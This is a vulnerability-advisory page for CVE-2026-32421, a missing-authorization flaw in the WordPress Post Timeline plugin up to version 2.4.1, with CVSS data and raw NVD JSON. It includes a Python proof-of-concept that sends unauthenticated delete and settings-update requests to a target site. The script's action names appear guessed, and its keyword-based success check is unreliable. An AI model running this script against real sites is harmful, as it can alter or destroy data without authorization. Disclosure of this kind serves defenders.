Security Vulnerability Report
中文
CVE-2026-32421 CVSS 5.3 MEDIUM

CVE-2026-32421

Published: 2026-03-13 19:55:00
Last Modified: 2026-04-29 10:17:08

Description

Missing Authorization vulnerability in Agile Logix Post Timeline post-timeline allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Timeline: from n/a through <= 2.4.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Post Timeline (WordPress) <= 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32421 PoC - WordPress Post Timeline Broken Access Control # Target: WordPress site with Post Timeline plugin <= 2.4.1 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-32421 Missing Authorization in Post Timeline plugin """ # Common Post Timeline AJAX endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/post-timeline/v1/', ] # Test actions that should require authorization test_actions = [ 'pt_save_timeline', 'pt_get_timeline', 'pt_delete_timeline', 'pt_update_settings', ] print(f'[*] Testing target: {target_url}') print(f'[*] CVE-2026-32421 - Missing Authorization in Post Timeline') print('-' * 60) for endpoint in endpoints: for action in test_actions: url = target_url.rstrip('/') + endpoint # Try unauthenticated request data = { 'action': action, 'nonce': '', # May work without valid nonce } try: response = requests.post(url, data=data, timeout=10, verify=False) # Check if we get unexpected success response if response.status_code == 200: # Check for signs of successful unauthorized access if any(keyword in response.text.lower() for keyword in ['timeline', 'success', 'data', 'settings', 'id']): print(f'[+] VULNERABLE: {url}?action={action}') print(f' Status: {response.status_code}') print(f' Response preview: {response.text[:200]}...') return True except requests.RequestException as e: print(f'[-] Error testing {action}: {e}') print('[*] No obvious vulnerability detected') print('[*] Manual testing recommended') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2026-32421_poc.py <target_url>') print('Example: python cve-2026-32421_poc.py http://example.com') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32421", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:59.883", "lastModified": "2026-04-29T10:17:08.317", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Agile Logix Post Timeline post-timeline allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Timeline: from n/a through <= 2.4.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Agile Logix Post Timeline post-timeline permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Post Timeline: desde n/a hasta &lt;= 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/post-timeline/vulnerability/wordpress-post-timeline-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}